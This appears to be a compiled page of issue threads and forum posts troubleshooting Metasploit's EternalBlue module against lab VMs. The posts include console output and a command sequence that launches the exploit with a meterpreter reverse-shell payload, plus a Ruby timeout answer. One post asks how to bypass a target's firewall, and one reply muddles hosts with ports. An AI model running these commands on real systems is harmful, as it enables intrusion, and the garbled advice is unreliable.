Steps to reproduce
How’d you do it?
- Selected the windows/smb/ms17_010_eternalblue exploit in msfconsole, filled out the parameters LHOST, LPORT, RPORT, ReverseListenerBindAddress and RHOSTS to my public IP, port 445 (which was open), port 445 again, my private IP and the IP of my virtual machine that was running an old version of Windows 7.
- Ran the exploit with the exploit command.
I have —
- opened the LPORT and made LPORT the same as the RPORT
- set all the required parameters in show options
- made the target a VM on the same network as mine and check if it crashed (spoiler alert: it didn’t)
- ran set timeout 999 to increase the timeout NB — it didn’t change the timeout at all
- made sure there wasn’t a SINGLE issue with my network that could stop it from working
None of the previous issue threads have helped.
Were you following a specific guide/tutorial or reading documentation?
Yes. https://www.youtube.com/watch?v=Q1vbb3pmi4Y
Expected behavior
The expected behaviour would be for a meterpreter shell to open.
Current behavior
I received the error RubySMB::Error::CommunicationError: Read timeout expired when reading from the Socket (timeout=30).
System stuff
Metasploit version
5.0.101-dev
I installed Metasploit with:
- Kali package via apt
- Omnibus installer (nightly)
- Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
- Source install (please specify ruby version)
OS
Kali Linux
somebody please help. it’s been 2 weeks already
I am also having this issue. However I am trying on tryhackme.org Blue challenge. I have restarted the machine twice and still not working
if you want to exploit using the eternalblue vulnerability…
it is more recommended if you’re using ElevenPaths’s eternalblue doublepulsar
and also don’t make lport and rport the same, because there is a possibility they interfere with each other
try the lport 4444 and the rport should be 445 (don’t ever change the rport or the exploit won’t work)
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label «not stale» to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
If all of the systems are on your private network, and Metasploit is running on the same LAN as your target VM then you shouldn’t need to set the ReverseListenerBindAddress option at all. Also are you certain that the target system is vulnerable? It would help if you included the output from Metasploit in the ticket so we could look at it.
Hi again!
It’s been 60 days since anything happened on this issue, so we are going to close it.
Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
you should not set the lhost and rhost value the same
they can interfere with each other….
try the lhost 4444 and the rhost should be 445
Has anyone run into this problem?
superuser
Hello gentlemen, please help, I have tried everything and nothing works. I ran into this problem: there is a Win7 machine with port 445 open; I scanned it with MSF and Nessus, and both say the box is vulnerable. I launch exploit/windows/smb/ms17_010_eternalblue and press run, and this is what appears:
[*] Started reverse TCP handler on 192.168.0.105:4444
[+] 10.16.116.39:445 — Host is likely VULNERABLE to MS17-010! — Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 10.16.116.39:445 — Connecting to target for exploitation.
[+] 10.16.116.39:445 — Connection established for exploitation.
[+] 10.16.116.39:445 — Target OS selected valid for OS indicated by SMB reply
[*] 10.16.116.39:445 — CORE raw buffer dump (38 bytes)
[*] 10.16.116.39:445 — 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 10.16.116.39:445 — 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 10.16.116.39:445 — 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 10.16.116.39:445 — Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.16.116.39:445 — Trying exploit with 12 Groom Allocations.
[*] 10.16.116.39:445 — Sending all but last fragment of exploit packet
[-] 10.16.116.39:445 — RubySMB::Error::CommunicationError: Read timeout expired when reading from the Socket (timeout=30)
Here are the options:
Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         10.16.116.39     yes       The target address range or CIDR identifier
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.105    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs
«RubySMB::Error::CommunicationError: Read timeout expired when reading from the Socket (timeout=30)» in windows/smb/ms17_010_eternalblue #14121
«RubySMB::Error::CommunicationError: Read timeout expired when reading from the Socket (timeout=30)» in windows/smb/ms17_010_eternalblue #14018
RubySMB::Error::CommunicationError #93
Error after running ms17_010_eternalblue
[*] test:139 — Connecting to target for exploitation.
[-] test:139 — RubySMB::Error::CommunicationError
[-] test:139 — An error occured reading from the Socket
[-] test:139 — /root/.rvm/gems/ruby-2.4.1@metasploit-framework/gems/ruby_smb-0.0.18/lib/ruby_smb/dispatcher/socket.rb:59:in `rescue in recv_packet'
/root/.rvm/gems/ruby-2.4.1@metasploit-framework/gems/ruby_smb-0.0.18/lib/ruby_smb/dispatcher/socket.rb:45:in `recv_packet'
/root/.rvm/gems/ruby-2.4.1@metasploit-framework/gems/ruby_smb-0.0.18/lib/ruby_smb/client.rb:229:in `send_recv'
/root/.rvm/gems/ruby-2.4.1@metasploit-framework/gems/ruby_smb-0.0.18/lib/ruby_smb/client/negotiation.rb:36:in `negotiate_request'
/root/.rvm/gems/ruby-2.4.1@metasploit-framework/gems/ruby_smb-0.0.18/lib/ruby_smb/client/negotiation.rb:14:in `negotiate'
/root/.rvm/gems/ruby-2.4.1@metasploit-framework/gems/ruby_smb-0.0.18/lib/ruby_smb/client.rb:186:in `login'
/opt/metasploit/modules/exploits/windows/smb/ms17_010_eternalblue.rb:359:in `smb1_anonymous_connect_ipc'
/opt/metasploit/modules/exploits/windows/smb/ms17_010_eternalblue.rb:165:in `smb_eternalblue'
/opt/metasploit/modules/exploits/windows/smb/ms17_010_eternalblue.rb:117:in `block in exploit'
/root/.rvm/gems/ruby-2.4.1@metasploit-framework/gems/activesupport-4.2.8/lib/active_support/core_ext/range/each.rb:7:in `each'
/root/.rvm/gems/ruby-2.4.1@metasploit-framework/gems/activesupport-4.2.8/lib/active_support/core_ext/range/each.rb:7:in `each_with_time_with_zone'
/opt/metasploit/modules/exploits/windows/smb/ms17_010_eternalblue.rb:113:in `exploit'
/opt/metasploit/lib/msf/core/exploit_driver.rb:206:in `job_run_proc'
/opt/metasploit/lib/msf/core/exploit_driver.rb:167:in `run'
/opt/metasploit/lib/msf/base/simple/exploit.rb:136:in `exploit_simple'
/opt/metasploit/lib/msf/base/simple/exploit.rb:161:in `exploit_simple'
/opt/metasploit/lib/msf/ui/console/command_dispatcher/exploit.rb:110:in `cmd_exploit'
/opt/metasploit/lib/rex/ui/text/dispatcher_shell.rb:430:in `run_command'
/opt/metasploit/lib/rex/ui/text/dispatcher_shell.rb:392:in `block in run_single'
/opt/metasploit/lib/rex/ui/text/dispatcher_shell.rb:386:in `each'
/opt/metasploit/lib/rex/ui/text/dispatcher_shell.rb:386:in `run_single'
/opt/metasploit/lib/rex/ui/text/shell.rb:205:in `run'
/opt/metasploit/lib/metasploit/framework/command/console.rb:48:in `start'
/opt/metasploit/lib/metasploit/framework/command/base.rb:82:in `start'
/opt/metasploit/msfconsole:48:in `
Rubysmb error communicationerror read timeout expired when reading from the socket timeout 30
I’ve been playing around with the EternalBlue exploit recently. I’ve downloaded a Windows 10 iso file from 2016 and used it to set up a Windows 10 Pro VM as my sandbox. I also ran the nmap script and metasploit scanner module to ensure that it is indeed vulnerable to ms17-010. However, when I run the exploit module, I get this:
I’ve spent the past hour testing out every single payload available and even tried the other eternalblue modules (which all didn’t work). Does anyone know what is denying me from gaining entry to my virtual machine here?
(PS I turned off the Windows Firewall and Windows Defender real-time protection on the win10 machine already)
That module doesn’t support Windows 10 targets. You can see from the targets that it supports Windows 7 and Server 2008.
The ms17_010_eternalblue_win8 module (despite its name) works on Windows 10. Says it was tested successfully on Windows 10 build 10240 and build 10586 so the build of your target is quite a bit newer but it may work.
FYI, it’s a known issue that these modules are separate and targeting is difficult which is why there’s an effort to combine them into one.
ms17_010_eternalblue RubySMB::Error::CommunicationError: Read timeout expired when reading from the socket
Steps to reproduce
- Opened metasploit and used exploit/windows/smb/ms17_010_eternalblue
- Set options and exploited.
Victim: Windows 10 build 1511 (Virtual Machine)
Expected behavior
I expected it to complete the exploit and I would have a shell to the victim’s computer.
Current behavior
Does everything like expected until..
[*] 192.168.2.19:445 — Sending all but last fragment of exploit packet
[-] 192.168.2.19:445 — RubySMB::Error::CommunicationError: Read timeout expired when reading from the socket (timeout=30)
[*] Exploit completed, but no session was created.
~/.msf4/logs/framework.log : https://pastebin.com/LL7ebz0r
System stuff
Metasploit version
Framework: 5.0.89-dev
Console: 5.0.89-dev
I installed Metasploit with:
- [+] Kali package via apt
- Omnibus installer (nightly)
- Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
- Source install (please specify ruby version)
OS
Kali Linux amd64
It is possible that the problem could be in the remote machine. I tested it on Blue on tryhackme and everything worked just fine.
The Metasploit log for my test machine was showing some unexpected errors, though.
Hi, it looks like your log shows an error with ms17_010_eternalblue_win8 rather than ms17_010_eternalblue.
Could you try these steps instead?
use windows/smb/ms17_010_eternalblue
set RHOSTS x.x.x.x
set LHOST x.x.x.x
set PAYLOAD windows/x64/meterpreter/reverse_tcp
options
run
Remember to set RHOSTS to the target machine’s IP, and LHOST to your IP on the tryhackme network. I have verified that the above works on the tryhackme blue room.
Closing as a duplicate of #13478
see your waf or security software
How do I bypass the waf of the target
help me?
Marc-André Lafortune’s solution is still the best if you can’t upgrade to ruby 2.x.
Starting from 2.x, a subclass of Timeout::Error will be raised depending on which timeout was triggered:
- Net::OpenTimeout
- Net::ReadTimeout
However, the read_timeout behavior is strange on 2.x, because it seems to double the value you set. This article explains why.
Here’s a test for both timeouts (tested on 1.8.7, 1.9.3, 2.1.2, 2.2.4).
EDIT: The open_timeout test works on Mac, but on Linux, the client gets a «connection refused» error.
require "net/http"
require "socket"

SERVER_HOST = '127.0.0.1'
SERVER_PORT = 9999

def main
  puts 'with_nonlistening_server'
  with_nonlistening_server do
    make_request
  end

  puts
  puts 'with_listening_server'
  with_listening_server do
    make_request
  end
end

def with_listening_server
  # This automatically starts listening
  serv = TCPServer.new(SERVER_HOST, SERVER_PORT)
  begin
    yield
  ensure
    serv.close
  end
end

def with_nonlistening_server
  raw_serv = Socket.new Socket::AF_INET, Socket::SOCK_STREAM, 0
  addr = Socket.pack_sockaddr_in SERVER_PORT, SERVER_HOST
  # Bind, but don't listen
  raw_serv.bind addr
  begin
    yield
  ensure
    raw_serv.close
  end
end

def make_request
  http = Net::HTTP.new(SERVER_HOST, SERVER_PORT)
  http.open_timeout = 1
  http.read_timeout = 1 # seems to be doubled on ruby 2.x
  start_tm = Time.now
  begin
    http.start
    begin
      http.get('/')
    rescue Timeout::Error => err
      puts "Read timeout: #{err.inspect}"
    end
  rescue Timeout::Error => err
    puts "Open timeout: #{err.inspect}"
  end
  end_tm = Time.now
  puts "Duration (sec): #{end_tm - start_tm}"
end

if __FILE__ == $PROGRAM_NAME
  main
end
Example output on 1.9.3:
with_nonlistening_server
Open timeout: #<Timeout::Error: execution expired>
Duration (sec): 1.002477
with_listening_server
Read timeout: #<Timeout::Error: Timeout::Error>
Duration (sec): 1.00599
Example output on 2.1.2:
with_nonlistening_server
Open timeout: #<Net::OpenTimeout: execution expired>
Duration (sec): 1.005923
with_listening_server
Read timeout: #<Net::ReadTimeout: Net::ReadTimeout>
Duration (sec): 2.009582
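The doubled read timeout in the 2.1.2 output comes from Net::HTTP retrying an idempotent request once after a read timeout, which Ruby 2.5 and later expose as `max_retries`. The added example below, which is not part of the original answer, points a client at a constructed loopback server that accepts connections and never replies, then counts the connections it receives; `SilentServer` and `stalled_get` are names made up for this sketch.

```ruby
require "net/http"
require "socket"

# Constructed test peer: accepts TCP connections on an ephemeral loopback
# port, never sends a byte, and counts how many connections it was given.
class SilentServer
  attr_reader :port

  def initialize
    @server = TCPServer.new("127.0.0.1", 0)
    @port = @server.addr[1]
    @held = []
    @lock = Mutex.new
    @thread = Thread.new do
      loop do
        sock = @server.accept
        @lock.synchronize { @held << sock }
      end
    end
  end

  def connections
    @lock.synchronize { @held.size }
  end

  def close
    @thread.kill
    @thread.join
    @server.close
    @held.each(&:close)
  end
end

# Sends one GET to a silent peer and reports the error class, the number of
# TCP connections the client opened, and the wall-clock time spent waiting.
def stalled_get(max_retries, read_timeout = 0.3)
  server = SilentServer.new
  http = Net::HTTP.new("127.0.0.1", server.port, nil) # nil: ignore proxy env vars
  http.open_timeout = 1
  http.read_timeout = read_timeout
  http.max_retries = max_retries # setter exists on Ruby >= 2.5
  started = Process.clock_gettime(Process::CLOCK_MONOTONIC)
  error = begin
    http.get("/")
    nil
  rescue Timeout::Error => e
    e.class
  end
  elapsed = Process.clock_gettime(Process::CLOCK_MONOTONIC) - started
  { error: error, connections: server.connections, elapsed: elapsed }
ensure
  server&.close
end

if __FILE__ == $PROGRAM_NAME
  [1, 0].each do |retries|
    r = stalled_get(retries)
    puts format("max_retries=%d -> %s, %d connection(s), %.2fs",
                retries, r[:error], r[:connections], r[:elapsed])
  end
end
```

When a client has to give up on a stalled peer within a fixed budget, the worst case to plan for is `read_timeout * (max_retries + 1)`, not `read_timeout` alone.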